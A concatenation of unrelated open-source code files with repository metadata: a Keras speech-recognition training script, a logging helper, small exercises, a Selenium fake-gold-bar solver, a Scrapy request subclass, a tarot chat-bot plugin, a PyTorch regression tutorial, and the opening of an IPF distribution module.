vis_spectrogram_feature = audio_gen.normalize(audio_gen.featurize(vis_audio_path))
# obtain mfcc
audio_gen = AudioGenerator(spectrogram=False)
audio_gen.load_train_data()
vis_mfcc_feature = audio_gen.normalize(audio_gen.featurize(vis_audio_path))
# obtain text label
vis_text = audio_gen.train_texts[index]
# obtain raw audio
vis_raw_audio, _ = librosa.load(vis_audio_path)
# print total number of training examples
print('There are %d total training examples.' % len(audio_gen.train_audio_paths))
# return labels for plotting
return vis_text, vis_raw_audio, vis_mfcc_feature, vis_spectrogram_feature, vis_audio_path
def plot_raw_audio(vis_raw_audio):
# plot the raw audio signal
fig = plt.figure(figsize=(12,3))
ax = fig.add_subplot(111)
steps = len(vis_raw_audio)
ax.plot(np.linspace(1, steps, steps), vis_raw_audio)
plt.title('Audio Signal')
plt.xlabel('Time')
plt.ylabel('Amplitude')
plt.show()
def plot_mfcc_feature(vis_mfcc_feature):
# plot the MFCC feature
fig = plt.figure(figsize=(12,5))
ax = fig.add_subplot(111)
im = ax.imshow(vis_mfcc_feature, cmap=plt.cm.jet, aspect='auto')
plt.title('Normalized MFCC')
plt.ylabel('Time')
plt.xlabel('MFCC Coefficient')
divider = make_axes_locatable(ax)
cax = divider.append_axes("right", size="5%", pad=0.05)
plt.colorbar(im, cax=cax)
ax.set_xticks(np.arange(0, 13, 2), minor=False);
plt.show()
def plot_spectrogram_feature(vis_spectrogram_feature):
# plot the normalized spectrogram
fig = plt.figure(figsize=(12,5))
ax = fig.add_subplot(111)
im = ax.imshow(vis_spectrogram_feature, cmap=plt.cm.jet, aspect='auto')
plt.title('Normalized Spectrogram')
plt.ylabel('Time')
plt.xlabel('Frequency')
divider = make_axes_locatable(ax)
cax = divider.append_axes("right", size="5%", pad=0.05)
plt.colorbar(im, cax=cax)
plt.show()
################################# all codes of data_generator.py ends here ###########################
# from data_generator import vis_train_features # ## Now codes of data_generator.py are pasted here. So I think that this import is useless
# extract label and audio features for a single training example
vis_text, vis_raw_audio, vis_mfcc_feature, vis_spectrogram_feature, vis_audio_path = vis_train_features()
# allocate 50% of GPU memory (if you like, feel free to change this)
from keras.backend.tensorflow_backend import set_session
from keras.optimizers import RMSprop, SGD
import tensorflow as tf
"""
config = tf.ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 0.5
set_session(tf.Session(config=config))
"""
# watch for any changes in the sample_models module, and reload it automatically
#%load_ext autoreload
#%autoreload 2
# import NN architectures for speech recognition
# from sample_models import * # I have pasted code of sample_models in this file. So no need to import this
# import function for training acoustic model
# from train_utils import train_model # I have pasted code of train_utils in this file. So no need to import this
import numpy as np
# from data_generator import AudioGenerator ## Now codes of data_generator.py are pasted here. So I think that this import is useless
from keras import backend as K
from utils import int_sequence_to_text
from IPython.display import Audio
###################### All codes / model defined in sample_models.py start here ################
def simple_rnn_model(input_dim, output_dim=29):
""" Build a recurrent network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# Add recurrent layer
simp_rnn = GRU(output_dim, return_sequences=True,
implementation=2, name='rnn')(input_data)
# Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(simp_rnn)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
model.output_length = lambda x: x
print(model.summary())
return model
def rnn_model(input_dim, units, activation, output_dim=29):
""" Build a recurrent network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# Add recurrent layer
simp_rnn = LSTM(units, activation=activation,
return_sequences=True, implementation=2, name='rnn')(input_data)
# TODO: Add batch normalization
bn_rnn = BatchNormalization(name='bn_rnn_1d')(simp_rnn)
# TODO: Add a TimeDistributed(Dense(output_dim)) layer
time_dense = TimeDistributed(Dense(output_dim))(bn_rnn)
# Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(time_dense)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
model.output_length = lambda x: x
print(model.summary())
return model
def cnn_rnn_model(input_dim, filters, kernel_size, conv_stride,
conv_border_mode, units, output_dim=29):
""" Build a recurrent + convolutional network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# Add convolutional layer
conv_1d = Conv1D(filters, kernel_size,
strides=conv_stride,
padding=conv_border_mode,
activation='relu',
name='conv1d')(input_data)
# Add batch normalization
bn_cnn = BatchNormalization(name='bn_conv_1d')(conv_1d)
# Add a recurrent layer
simp_rnn = GRU(units, activation='relu',
return_sequences=True, implementation=2, name='rnn')(bn_cnn)
# TODO: Add batch normalization
bn_rnn = BatchNormalization(name='bn_rnn_1d')(simp_rnn)
# TODO: Add a TimeDistributed(Dense(output_dim)) layer
time_dense = TimeDistributed(Dense(output_dim))(bn_rnn)
# Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(time_dense)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
model.output_length = lambda x: cnn_output_length(
x, kernel_size, conv_border_mode, conv_stride)
print(model.summary())
return model
def cnn_output_length(input_length, filter_size, border_mode, stride,
dilation=1):
""" Compute the length of the output sequence after 1D convolution along
time. Note that this function is in line with the function used in
Convolution1D class from Keras.
Params:
input_length (int): Length of the input sequence.
filter_size (int): Width of the convolution kernel.
border_mode (str): Only support `same` or `valid`.
stride (int): Stride size used in 1D convolution.
dilation (int)
"""
if input_length is None:
return None
assert border_mode in {'same', 'valid'}
dilated_filter_size = filter_size + (filter_size - 1) * (dilation - 1)
if border_mode == 'same':
output_length = input_length
elif border_mode == 'valid':
output_length = input_length - dilated_filter_size + 1
return (output_length + stride - 1) // stride
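# A quick illustrative self-check of cnn_output_length (added commentary; the numbers are
# hypothetical and this helper is never called by the training code): with kernel size 11
# and stride 2, a 100-step input gives (100 - 11 + 1 + 2 - 1) // 2 = 45 steps for 'valid'
# padding and (100 + 2 - 1) // 2 = 50 steps for 'same' padding.
def _demo_cnn_output_length():
    assert cnn_output_length(100, 11, 'valid', 2) == 45
    assert cnn_output_length(100, 11, 'same', 2) == 50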
def deep_rnn_model(input_dim, units, recur_layers, output_dim=29):
""" Build a deep recurrent network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# TODO: Add recurrent layers, each with batch normalization
if recur_layers == 1:
layer = LSTM(units, return_sequences=True, activation='relu')(input_data)
layer = BatchNormalization(name='bt_rnn_1')(layer)
else:
layer = LSTM(units, return_sequences=True, activation='relu')(input_data)
layer = BatchNormalization(name='bt_rnn_1')(layer)
for i in range(recur_layers - 2):
layer = LSTM(units, return_sequences=True, activation='relu')(layer)
layer = BatchNormalization(name='bt_rnn_{}'.format(2+i))(layer)
layer = LSTM(units, return_sequences=True, activation='relu')(layer)
layer = BatchNormalization(name='bt_rnn_last_rnn')(layer)
# TODO: Add a TimeDistributed(Dense(output_dim)) layer
time_dense = TimeDistributed(Dense(output_dim))(layer)
# Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(time_dense)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
model.output_length = lambda x: x
print(model.summary())
return model
def bidirectional_rnn_model(input_dim, units, output_dim=29):
""" Build a bidirectional recurrent network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# TODO: Add bidirectional recurrent layer
bidir_rnn = Bidirectional(LSTM(units, return_sequences=True, activation='relu'), merge_mode='concat')(input_data)
# TODO: Add a TimeDistributed(Dense(output_dim)) layer
time_dense = TimeDistributed(Dense(output_dim))(bidir_rnn)
# Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(time_dense)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
model.output_length = lambda x: x
print(model.summary())
return model
def final_model(input_dim, filters, kernel_size, conv_stride,
conv_border_mode, units, output_dim=29, dropout_rate=0.5, number_of_layers=2,
cell=GRU, activation='tanh'):
""" Build a deep network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# TODO: Specify the layers in your network
conv_1d = Conv1D(filters, kernel_size,
strides=conv_stride,
padding=conv_border_mode,
activation='relu',
name='layer_1_conv',
dilation_rate=1)(input_data)
conv_bn = BatchNormalization(name='conv_batch_norm')(conv_1d)
if number_of_layers == 1:
layer = cell(units, activation=activation,
return_sequences=True, implementation=2, name='rnn_1', dropout=dropout_rate)(conv_bn)
layer = BatchNormalization(name='bt_rnn_1')(layer)
else:
layer = cell(units, activation=activation,
return_sequences=True, implementation=2, name='rnn_1', dropout=dropout_rate)(conv_bn)
layer = BatchNormalization(name='bt_rnn_1')(layer)
for i in range(number_of_layers - 2):
layer = cell(units, activation=activation,
return_sequences=True, implementation=2, name='rnn_{}'.format(i+2), dropout=dropout_rate)(layer)
layer = BatchNormalization(name='bt_rnn_{}'.format(i+2))(layer)
layer = cell(units, activation=activation,
return_sequences=True, implementation=2, name='final_layer_of_rnn')(layer)
layer = BatchNormalization(name='bt_rnn_final')(layer)
time_dense = TimeDistributed(Dense(output_dim))(layer)
# TODO: Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(time_dense)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
# TODO: Specify model.output_length
model.output_length = lambda x: cnn_output_length(
x, kernel_size, conv_border_mode, conv_stride)
print(model.summary())
return model
##################################### code / model defined in sample_models.py ends here ##############################
########################## all codes of train_utils.py starts here #########################
def ctc_lambda_func(args):
y_pred, labels, input_length, label_length = args
#print("y_pred.shape = " + str(y_pred.shape))
#print("labels.shape = " + str(labels.shape))
#print("input_length.shape = " + str(input_length.shape))
#print("label_length.shape = " + str(label_length.shape))
return K.ctc_batch_cost(labels, y_pred, input_length, label_length) # input_length= seq length of each item in y_pred
# label_length is the seq length of each item in labels
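# Shape sketch for the arguments above (illustrative, assuming the default minibatch_size
# of 20 and 29 output symbols; added commentary, not extra logic):
#   y_pred:        (20, T, 29)  softmax scores per time step
#   labels:        (20, L)      integer-encoded transcriptions, padded with the blank index 28
#   input_length:  (20, 1)      sequence length of each item in y_pred
#   label_length:  (20, 1)      sequence length of each item in labels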
def add_ctc_loss(input_to_softmax):
the_labels = Input(name='the_labels', shape=(None,), dtype='float32')
input_lengths = Input(name='input_length', shape=(1,), dtype='int64')
label_lengths = Input(name='label_length', shape=(1,), dtype='int64')
output_lengths = Lambda(input_to_softmax.output_length)(input_lengths)
# output_length = BatchNormalization()(input_lengths)
# CTC loss is implemented in a lambda layer
loss_out = Lambda(ctc_lambda_func, output_shape=(1,), name='ctc')(
[input_to_softmax.output, the_labels, output_lengths, label_lengths])
model = Model(
inputs=[input_to_softmax.input, the_labels, input_lengths, label_lengths],
outputs=loss_out)
return model
def train_model(input_to_softmax,
pickle_path,
save_model_path,
train_json='train_corpus.json',
valid_json='valid_corpus.json',
minibatch_size=20,
spectrogram=True,
mfcc_dim=13,
optimizer=SGD(lr=0.02, decay=1e-6, momentum=0.9, nesterov=True, clipnorm=5),
epochs=20,
verbose=1,
sort_by_duration=False,
max_duration=10.0):
# create a class instance for obtaining batches of data
audio_gen = AudioGenerator(minibatch_size=minibatch_size,
spectrogram=spectrogram, mfcc_dim=mfcc_dim, max_duration=max_duration,
sort_by_duration=sort_by_duration)
# add the training data to the generator
audio_gen.load_train_data(train_json)
audio_gen.load_validation_data(valid_json)
# calculate steps_per_epoch
num_train_examples=len(audio_gen.train_audio_paths)
steps_per_epoch = num_train_examples//minibatch_size
# calculate validation_steps
num_valid_samples = len(audio_gen.valid_audio_paths)
validation_steps = num_valid_samples//minibatch_size
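    # With the corpus truncated above (500 training / 50 validation utterances) and the
    # default minibatch_size of 20, this works out to 500 // 20 = 25 training steps and
    # 50 // 20 = 2 validation steps per epoch (illustrative arithmetic, added for clarity).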
# add CTC loss to the NN specified in input_to_softmax
model = add_ctc_loss(input_to_softmax)
# CTC loss is implemented elsewhere, so use a dummy lambda function for the loss
model.compile(loss={'ctc': lambda y_true, y_pred: y_pred}, optimizer=optimizer)
# make results/ directory, if necessary
if not os.path.exists('results'):
os.makedirs('results')
# add checkpointer
checkpointer = ModelCheckpoint(filepath='results/'+save_model_path, verbose=0)
# train the model
hist = model.fit_generator(generator=audio_gen.next_train(), steps_per_epoch=steps_per_epoch,
epochs=epochs, validation_data=audio_gen.next_valid(), validation_steps=validation_steps,
callbacks=[checkpointer], verbose=verbose)
# save model loss
with open('results/'+pickle_path, 'wb') as f:
pickle.dump(hist.history, f)
################################ all codes of train_utils.py ends here #######################################
"""
model_0 = simple_rnn_model(input_dim=13) # change to 13 if you would like to use MFCC features
"""
"""
train_model(input_to_softmax=model_0,
pickle_path='model_0.pickle',
save_model_path='model_0.h5',
spectrogram=False) # change to False if you would like to use MFCC features
"""
model_end = final_model(input_dim=13,
filters=200,
kernel_size=11,
conv_stride=2,
conv_border_mode='valid',
units=200,
activation='relu',
cell=GRU,
dropout_rate=1,
number_of_layers=2)
train_model(input_to_softmax=model_end,
pickle_path='model_end.pickle',
save_model_path='model_end.h5',
epochs=5,
spectrogram=False)
"""
model_4 = bidirectional_rnn_model(input_dim=13, # change to 13 if you would like to use MFCC features
units=200)
train_model(input_to_softmax=model_4,
pickle_path='model_4.pickle',
save_model_path='model_4.h5',
epochs=5,
optimizer=SGD(lr=0.02, decay=1e-6, momentum=0.9, nesterov=True, clipnorm=2),
spectrogram=False) # change to False if you would like to use MFCC features
"""
def get_predictions(index, partition, input_to_softmax, model_path):
""" Print a model's decoded predictions
Params:
index (int): The example you would like to visualize
partition (str): One of 'train' or 'validation'
input_to_softmax (Model): The acoustic model
model_path (str): Path to saved acoustic model's weights
"""
# load the train and test data
data_gen = AudioGenerator(spectrogram=False)
data_gen.load_train_data()
data_gen.load_validation_data()
# obtain the true transcription and the audio features
if partition == 'validation':
transcr = data_gen.valid_texts[index]
audio_path = data_gen.valid_audio_paths[index]
data_point = data_gen.normalize(data_gen.featurize(audio_path))
elif partition == 'train':
transcr = data_gen.train_texts[index]
audio_path = data_gen.train_audio_paths[index]
data_point = data_gen.normalize(data_gen.featurize(audio_path))
else:
raise Exception('Invalid partition! Must be "train" or "validation"')
# obtain and decode the acoustic model's predictions
input_to_softmax.load_weights(model_path)
prediction = input_to_softmax.predict(np.expand_dims(data_point, axis=0))
print("prediction.shape: " + str(prediction.shape))
output_length = [input_to_softmax.output_length(data_point.shape[0])]
pred_ints = (K.eval(K.ctc_decode(
prediction, output_length)[0][0])+1).flatten().tolist()
print("pred_ints: " + str(pred_ints))
print("len(pred_ints): " + str(len(pred_ints)))
# play the audio file, and display the true and predicted transcriptions
print('-'*80)
Audio(audio_path)
print('True transcription:\n' + '\n' + transcr)
print('-'*80)
print('Predicted transcription:\n' + '\n' + ''.join(int_sequence_to_text(pred_ints)))
print('-'*80)
"""
get_predictions(index=2,
partition='validation',
input_to_softmax=model_end,
model_path='results/model_end.h5')
"""
"""
get_predictions(index=1,
partition='validation',
input_to_softmax=model_0,
model_path='results/model_0.h5')
"""
|
MdAbuNafeeIbnaZahid/English-Speech-to-Text-Using-Keras
|
speech-recognition-neural-network/train.py
|
train.py
|
py
| 31,706 |
python
|
en
|
code
| 6 |
github-code
|
6
|
28892210067
|
import os
import time
def log(filename, text):
"""
Writes text to file in logs/mainnet/filename and adds a timestamp
:param filename: filename
:param text: text
:return: None
"""
path = "logs/mainnet/"
if not os.path.isdir("logs/"):
os.makedirs("logs/")
if not os.path.isdir("logs/mainnet/"):
os.makedirs("logs/mainnet/")
f = open(path+filename, "a")
f.write(time.strftime('[%Y-%m-%d %H:%M:%S]:', time.localtime(time.time()))+str(text)+"\n")
f.flush()
f.close()
def log_and_print(filename, text):
"""
Writes text to file in logs/mainnet/filename, adds a timestamp and prints the same to the console
:param filename: filename
:param text: text
:return: None
"""
log(filename, text)
print(time.strftime('[%Y-%m-%d %H:%M:%S]:', time.localtime(time.time()))+str(text))
|
Devel484/Equalizer
|
API/log.py
|
log.py
|
py
| 871 |
python
|
en
|
code
| 4 |
github-code
|
6
|
32028505345
|
#x = int(input())
#y = int(input())
#z = int(input())
#n = int(input())
#
#array = []
#for valuex in range(0,x+1):
# for valuey in range (0,y+1):
# for valuez in range (0,z+1):
# if (valuex + valuey + valuez ==n):
# continue
# else:
# array.append([valuex,valuey,valuez])
# #print(f"[{valuex},{valuey},{valuez}]")
#
#
#print(array)
"""AI version"""
x = int(input())
y = int(input())
z = int(input())
n = int(input())
# Generate all possible combinations of x, y and z -- same as the triple nested for loop above
combinations = [(valuex, valuey, valuez) for valuex in range(0, x+1) for valuey in range(0, y+1) for valuez in range(0, z+1)]
# Filter the list to keep only the combinations whose sum is not equal to n
array = [combination for combination in combinations if sum(combination) != n]
print(array)
|
Andreius-14/Notas_Mini
|
3.Python/Hackerrank/array.py
|
array.py
|
py
| 899 |
python
|
en
|
code
| 0 |
github-code
|
6
|
6309221669
|
# this sets your path correctly so the imports work
import sys
import os
sys.path.insert(1, os.path.dirname(os.getcwd()))
from api import QuorumAPI
import json
# this library will let us turn dictionaries into csv files
import csv
STATES = {
'AK': 'Alaska',
'AL': 'Alabama',
'AR': 'Arkansas',
'AS': 'American Samoa',
'AZ': 'Arizona',
'CA': 'California',
'CO': 'Colorado',
'CT': 'Connecticut',
'DC': 'District of Columbia',
'DE': 'Delaware',
'FL': 'Florida',
'GA': 'Georgia',
'GU': 'Guam',
'HI': 'Hawaii',
'IA': 'Iowa',
'ID': 'Idaho',
'IL': 'Illinois',
'IN': 'Indiana',
'KS': 'Kansas',
'KY': 'Kentucky',
'LA': 'Louisiana',
'MA': 'Massachusetts',
'MD': 'Maryland',
'ME': 'Maine',
'MI': 'Michigan',
'MN': 'Minnesota',
'MO': 'Missouri',
'MP': 'Northern Mariana Islands',
'MS': 'Mississippi',
'MT': 'Montana',
'NA': 'National',
'NC': 'North Carolina',
'ND': 'North Dakota',
'NE': 'Nebraska',
'NH': 'New Hampshire',
'NJ': 'New Jersey',
'NM': 'New Mexico',
'NV': 'Nevada',
'NY': 'New York',
'OH': 'Ohio',
'OK': 'Oklahoma',
'OR': 'Oregon',
'PA': 'Pennsylvania',
'PR': 'Puerto Rico',
'RI': 'Rhode Island',
'SC': 'South Carolina',
'SD': 'South Dakota',
'TN': 'Tennessee',
'TX': 'Texas',
'UT': 'Utah',
'VA': 'Virginia',
'VI': 'Virgin Islands',
'VT': 'Vermont',
'WA': 'Washington',
'WI': 'Wisconsin',
'WV': 'West Virginia',
'WY': 'Wyoming'
}
class MapAPI(QuorumAPI):
def map(self, return_map=False):
if return_map in [True, False]:
self.filters["map"] = return_map
else:
raise Exception("Must be a Boolean value!")
return self
class MapVisualizer(object):
# Since both the api_key and username stay the same so initialize API object once
quorum_api = MapAPI(username="gwc", api_key="691e43c415d88cd16286edb1f78abb2e348688da")
# Let's write a helper function that takes in a dictionary of (state, number)
# key-value pairs and produces a csv file of the following format:
# state,num
# Alabama,9
# Alaska, 5
# ...etc.
# We can use the csv class that we imported above.
def save_state_csv(self, item_list, file_name):
# we want to use python's 'with...as' syntax because
# it is a safe way to open and write files.
with open(file_name, 'w') as f: # w instead of wb in python 3
w = csv.writer(f, delimiter=',')
w.writerow(('state', 'num'))
for i in item_list:
w.writerow((STATES[i['state'].upper()], i['value']))
def get_female_legislators_per_state(self, search_term):
"""
get the number of female legislators per state.
Write this to the data.csv file that will then be used
"""
# An enum is a data type consisting of a set of named values called elements or numbers. A color enum may include
# blue, green, and red.
# class Gender(PublicEnum):
# male = enum.Item(
# 1,
# 'Male',
# slug="male",
# pronoun="he",
# pronoun_object="him",
# pronoun_possessive="his",
# honorific="Mr."
# )
# female = enum.Item(
# 2,
# 'Female',
# slug="female",
# pronoun="she",
# pronoun_object="her",
# pronoun_possessive="her",
# honorific="Ms."
# How can we get the number of female legislators per state?
quorum_api_females = self.quorum_api.set_endpoint("TODO") \
.map(True) \
.count(True) \
.filter(
# TODO
most_recent_person_type=1 # legislators
)
        # retrieves the total females and assigns the result to a dictionary
total_females = quorum_api_females.GET()
# Clears the API results before the next API call
quorum_api_females.clear()
# How can we get the total number of legislators per state?
# TODO
        # Retrieve the total number of legislators per state and assign to a dictionary
# Clear the API results before next API call
# Now let's find the proportion of women over total legislators per state!
self.save_state_csv(TODO, 'data.csv')
# After you are done with implementing the code, initialize a map!
cv = MapVisualizer()
# And enter the search term that you are interested in, and go back to localhost:8000,
# is the map what you expected it to be?
cv.get_female_legislators_per_state()
|
wynonna/from_GWC_laptop
|
quorum-gwc-master/project_2/main.py
|
main.py
|
py
| 5,060 |
python
|
en
|
code
| 0 |
github-code
|
6
|
37559653754
|
from selenium import webdriver
import time
# Change the path below to wherever your chromedriver is located
PATH = r"C:\Program Files (x86)\chromedriver.exe"
driver = webdriver.Chrome(PATH)
driver.get("http://ec2-54-208-152-154.compute-1.amazonaws.com/")
arrayOfBar = []
arrayLeftBowl = []
arrayRightBowl = []
n = 9
for i in range(n):
arrayLeftBowl.append(driver.find_element_by_id("left_" + str(i)))
arrayRightBowl.append(driver.find_element_by_id("right_" + str(i)))
arrayOfBar.append(driver.find_element_by_id("coin_" + str(i)))
"""
This problem is a natural fit for divide and conquer, so binary search is used.
We divide the gold bars into three parts: the left bowl, the middle bar, and the right bowl.
If the left and right bowls weigh the same, then the middle bar is the FAKE GOLD.
If the left bowl is lighter than the right bowl, we toss everything from mid + 1 to n (the size of the array);
if the left bowl is heavier than the right bowl, we toss everything from 0 to mid - 1.
Each weighing keeps the lighter half, halving the search space, which gives O(log n) time complexity.
"""
low = 0
high = len(arrayOfBar) - 1
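# Worked example of the strategy above (added for illustration): with 9 bars, the first
# weighing puts bars 0-3 in the left bowl and bars 5-8 in the right bowl (mid = 4).
# An '=' result pins the fake on bar 4; otherwise the lighter half of 4 bars is searched
# the same way, so only about log2(9) weighings are needed.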
while(low < high):
mid = int(low + ((high - low) / 2))
# reset the table
driver.find_element_by_xpath("/html/body/div/div/div[1]/div[4]/button[1]").click()
j = 0
for i in range (low, mid):
# setting the left table
arrayLeftBowl[j].send_keys(i)
j += 1
j = 0
for i in range (mid + 1, high + 1):
# setting the right table
arrayRightBowl[j].send_keys(i)
j += 1
# Weight the item
driver.find_element_by_xpath("/html/body/div/div/div[1]/div[4]/button[2]").click()
time.sleep(5)
# getting the result after weight
result = driver.find_element_by_xpath("/html/body/div/div/div[1]/div[2]/button").text
if(j == 1):
if(result == "<"):
print("Fake gold is " + str(low))
arrayOfBar[low].click()
break
elif(result == ">"):
print("Fake gold is " + str(high))
arrayOfBar[high].click()
break
if(result == "="):
print("Fake gold is " + str(mid))
arrayOfBar[mid].click()
break
elif( result == ">"):
low = mid;
else:
high = mid;
time.sleep(3)
driver.quit()
|
LiyaNorng/Fetch-Rewards-Coding-Exercise
|
FakeGold.py
|
FakeGold.py
|
py
| 2,344 |
python
|
en
|
code
| 1 |
github-code
|
6
|
60822349
|
"""
Scrapy 1.5 requires request.callback and request.errback to be either None or a callable,
which makes some features impossible to implement. This module removes that restriction.
"""
from scrapy import Request as _Request
from scrapy.http.headers import Headers
class Request(_Request):
def __init__(self, url, callback=None, method='GET', headers=None, body=None,
cookies=None, meta=None, encoding='utf-8', priority=0,
dont_filter=False, errback=None, flags=None, cb_kwargs=None):
self._encoding = encoding # this one has to be set first
self.method = str(method).upper()
self._set_url(url)
self._set_body(body)
assert isinstance(priority, int), "Request priority not an integer: %r" % priority
self.priority = priority
assert callback or not errback, "Cannot use errback without a callback"
self.callback = callback
self.errback = errback
self.cookies = cookies or {}
self.headers = Headers(headers or {}, encoding=encoding)
self.dont_filter = dont_filter
self._meta = dict(meta) if meta else None
self._cb_kwargs = dict(cb_kwargs) if cb_kwargs else None
self.flags = [] if flags is None else list(flags)
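# Illustrative (hypothetical) usage enabled by the relaxed checks above: unlike the stock
# scrapy Request, which asserts that callback/errback are callables, this subclass also
# accepts e.g. a string naming the callback, to be resolved later by the project's own
# spider or middleware code:
#
#   req = Request("https://example.com", callback="parse_item")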
|
ShichaoMa/structure_spider
|
structor/custom_request.py
|
custom_request.py
|
py
| 1,255 |
python
|
en
|
code
| 29 |
github-code
|
6
|
24452709455
|
import json
import os
import random
from nonebot import on_keyword, logger
from nonebot.adapters.mirai2 import MessageSegment, Bot, Event
tarot = on_keyword({"塔罗牌"}, priority=5)
@tarot.handle()
async def send_tarot(bot: Bot, event: Event):
    """Draw a tarot card"""
card, filename = await get_random_tarot()
image_dir = random.choice(['normal', 'reverse'])
card_type = '正位' if image_dir == 'normal' else '逆位'
content = f"{card['name']} ({card['name-en']}) {card_type}\n牌意:{card['meaning'][image_dir]}"
elements = []
img_path = os.path.join(f"{os.getcwd()}", "warfarin", "plugins", "Tarot", "resource", f"{image_dir}",
f"{filename}.jpg")
logger.debug(f"塔罗牌图片:{img_path}")
if filename and os.path.exists(img_path):
elements.append(MessageSegment.image(path=img_path))
elements.append(MessageSegment.plain(content))
await tarot.finish(elements)
async def get_random_tarot():
# path = f"{os.getcwd()}/warfarin/plugins/Tarot/resource/tarot.json"
path = os.path.join(f"{os.getcwd()}", "warfarin", "plugins", "Tarot", "resource", "tarot.json")
with open(path, 'r', encoding='utf-8') as json_file:
data = json.load(json_file)
kinds = ['major', 'pentacles', 'wands', 'cups', 'swords']
cards = []
for kind in kinds:
cards.extend(data[kind])
card = random.choice(cards)
filename = ''
for kind in kinds:
if card in data[kind]:
filename = '{}{:02d}'.format(kind, card['num'])
break
return card, filename
|
mzttsaintly/Warfarin-bot
|
warfarin/plugins/Tarot/__init__.py
|
__init__.py
|
py
| 1,590 |
python
|
en
|
code
| 1 |
github-code
|
6
|
32509281023
|
import torch
import torch.nn as nn  # imported to use the nn.Linear layer
# F.mse_loss (mean squared error) <- the loss function for linear regression
# For classification problems the usual loss function is cross-entropy
import torch.nn.functional as F
import torch.optim as optim  # optimization library: SGD, Adam, etc.
# Create sample data
# (a single input and a single output would be simple linear regression)
# Multi-variable linear regression (3 inputs, 1 output)
# Create the 4x3 2D input tensor (x_train)
x_train = torch.FloatTensor([[90, 73, 89],
[66, 92, 83],
[86, 87, 78],
[85, 96, 75]])
# y_train (GT)
y_train = torch.FloatTensor([[152],
[185],
[100],
[193]])
# Declare and initialize the model
# y = WX (w1*x1 + w2*x2...wn*xn + b)
# nn.Linear(input_dim, output_dim)
# Initialization:
# w = randn(1)
# model.parameters (weights: 3, bias: 1)
# weight and bias are automatically initialized with random values
model = nn.Linear(3, 1)  # see the get_weights() function
# model.parameters() holds what we optimize; since gradients are taken w.r.t. w and b,
# they are created with requires_grad=True.
print(list(model.parameters()))
optimizer = optim.SGD(model.parameters(), lr=0.01)  # learning rate: found by trial and error
# Set the number of iterations (number of epochs)
# epoch: how many times gradient descent runs over the whole training set (w and b are updated over 2000 passes)
nb_epochs = 2000
for epoch in range(nb_epochs+1):
    # Compute H(x): run one wx+b forward pass and assign the result to pred
    # x_train = the input data; w and b start from random values (e.g. 0.6242 and -0.1192)
    # prediction = w*x_train + b
    pred = model(x_train)
    # Compute the cost (loss function: mean squared error)
    # Cost function / loss function --> cost, loss, error
    # mse = mean((y - y_hat)**2)
    cost = F.mse_loss(pred, y_train)  # y_train is the ground truth
    # Use SGD to move toward the optimum (adjust the w and b values)
    optimizer.zero_grad()  # without zeroing, gradients would accumulate across iterations
    cost.backward()  # compute the actual gradient values
    optimizer.step()  # update w and b
    # Print a log every 100 epochs
if epoch % 100 == 0:
tmp = list(model.parameters())
print(f'Epoch: {epoch:4d} Cost : {cost.item(): .6f}')
print(f'w, b: {tmp[0]}, {tmp[1]}')
new_var = torch.FloatTensor([[73, 80, 75]])
# If the output is close to 152, we judge that training went well.
pred_y = model(new_var) # model.forward(new_var)
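# Illustrative check (added for clarity): if training converged, the prediction for the
# unseen sample [73, 80, 75] should come out close to the 152 mentioned above.
print('prediction for [73, 80, 75]:', pred_y.detach().numpy())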
|
JEONJinah/Shin
|
multi_varialbe_LR.py
|
multi_varialbe_LR.py
|
py
| 2,761 |
python
|
ko
|
code
| 0 |
github-code
|
6
|
38958650130
|
import os
if not os.path.exists('./checkpoints'):
os.makedirs('./checkpoints')
if not os.path.exists('./model'):
os.makedirs('./model')
#Simulation configuration
MAX_EPISODE = 500
TS = 1e-3
CLR_DECAY = 0
ALR_DECAY = 0
# Hyper-parameters
WARMUP = False
EPS_WARM = 5
#Learning strategies
PANDA = True
TRAIN = False
|
giuliomattera/Cartpole-RL-agents-control-ros-bridge-for-simulink
|
rl_connection/src/config.py
|
config.py
|
py
| 328 |
python
|
en
|
code
| 6 |
github-code
|
6
|
18307407152
|
import importlib.util as iutil
import os
from datetime import datetime
from time import perf_counter
from uuid import uuid4
import numpy as np
import yaml
from aequilibrae.distribution.ipf_core import ipf_core
from aequilibrae.context import get_active_project
from aequilibrae.matrix import AequilibraeMatrix, AequilibraeData
from aequilibrae.project.data.matrix_record import MatrixRecord
spec = iutil.find_spec("openmatrix")
has_omx = spec is not None
class Ipf:
"""Iterative proportional fitting procedure
.. code-block:: python
>>> from aequilibrae import Project
>>> from aequilibrae.distribution import Ipf
>>> from aequilibrae.matrix import AequilibraeMatrix, AequilibraeData
>>> project = Project.from_path("/tmp/test_project_ipf")
>>> matrix = AequilibraeMatrix()
# Here we can create from OMX or load from an AequilibraE matrix.
>>> matrix.load('/tmp/test_project/matrices/demand.omx')
>>> matrix.computational_view()
>>> args = {"entries": matrix.zones, "field_names": ["productions", "attractions"],
... "data_types": [np.float64, np.float64], "memory_mode": True}
>>> vectors = AequilibraeData()
>>> vectors.create_empty(**args)
>>> vectors.productions[:] = matrix.rows()[:]
>>> vectors.attractions[:] = matrix.columns()[:]
# We assume that the indices would be sorted and that they would match the matrix indices
>>> vectors.index[:] = matrix.index[:]
>>> args = {
... "matrix": matrix, "rows": vectors, "row_field": "productions", "columns": vectors,
... "column_field": "attractions", "nan_as_zero": False}
>>> fratar = Ipf(**args)
>>> fratar.fit()
# We can get back to our OMX matrix in the end
